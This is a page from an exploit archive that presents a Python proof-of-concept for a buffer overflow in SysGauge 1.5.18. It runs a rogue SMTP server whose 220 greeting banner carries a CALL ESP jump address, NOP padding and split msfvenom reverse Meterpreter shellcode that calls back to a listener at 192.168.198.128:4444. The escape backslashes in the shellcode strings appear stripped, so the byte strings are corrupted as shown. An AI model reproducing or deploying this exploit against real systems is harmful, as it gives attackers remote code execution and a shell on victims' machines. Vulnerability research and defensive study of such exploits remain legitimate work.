SysGauge 1.5.18 - Buffer Overflow
Posted on 30 November -0001
<HTML><HEAD><TITLE>SysGauge 1.5.18 - Buffer Overflow</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: SysGauge 1.5.18 – buffer overflow in SMTP connection verification function leads to code execution # Date: 2017-02-28 # Exploit Author: Peter Baris # Vendor Homepage: http://www.saptech-erp.com.au # Software Link: http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe # Version: 1.5.18 # Tested on: Windows Server 2008 R2 Standard x64 # CVE : requested # The shellcode has to be split into 2 pieces for the exploit to work and has to be placed at the offsets like shown below. # The 1st part can be max. 236 bytes # The 2nd part can be max. 76 (leave at least 4 NOPs) import socket # QtGui4.dll 0x6527635E - CALL ESP jmp = "x5ex63x27x65" nops = "x90"*8 # reverse meterpreter shell 306 bytes long bad chars x00x0ax0bx20 #IP: 192.168.198.128, PORT: 4444 # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b x00x0ax0dx20 --smallest rev_met_1=("x6ax47x59xd9xeexd9x74x24xf4x5bx81x73x13x1fx2d" "x97x97x83xebxfcxe2xf4xe3xc5x15x97x1fx2dxf7x1e" "xfax1cx57xf3x94x7dxa7x1cx4dx21x1cxc5x0bxa6xe5" "xbfx10x9axddxb1x2exd2x3bxabx7ex51x95xbbx3fxec" "x58x9ax1exeax75x65x4dx7ax1cxc5x0fxa6xddxabx94" "x61x86xefxfcx65x96x46x4exa6xcexb7x1exfex1cxde" "x07xcexadxdex94x19x1cx96xc9x1cx68x3bxdexe2x9a" "x96xd8x15x77xe2xe9x2exeax6fx24x50xb3xe2xfbx75" "x1cxcfx3bx2cx44xf1x94x21xdcx1cx47x31x96x44x94" "x29x1cx96xcfxa4xd3xb3x3bx76xccxf6x46x77xc6x68" "xffx72xc8xcdx94x3fx7cx1ax42x45xa4xa5x1fx2dxff" "xe0x6cx1fxc8xc3x77x61xe0xb1x18xd2x42x2fx8fx2c" "x97x97x36xe9xc3xc7x77x04x17xfcx1fxd2x42xfdx1a" "x45x57x3fxd9xadxffx95x1fx3cxcbx1exf9x7dxc7xc7" "x4fx6dxc7xd7x4fx45x7dx98xc0xcdx68x42x88x47x87" "xc1x48x45x0ex32x6bx4c") rev_met_2=("x68x42x9axedxe3x9bxe0x63" "x9fxe2xf3x45x67x22xbdx7bx68x42x75x2dxfdx93x49" "x7axffx95xc6xe5xc8x68xcaxa6xa1xfdx5fx45x97x87" "x1fx2dxc1xfdx1fx45xcfx33x4cxc8x68x42x8cx7exfd" "x97x49x7exc0xffx1dxf4x5fxc8xe0xf8x96x54x36xeb" "xe2x79xdcx2dx97x97") buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1 port = 25 s = socket.socket() ip = '0.0.0.0' s.bind((ip, port)) s.listen(5) print 'Listening on SMTP port: '+str(port) print(len(rev_met_1)) print(len(rev_met_2)) while True: conn, addr = s.accept() conn.send('220 '+buffer+'ESMTP Sendmail ') conn.close() </BODY></HTML>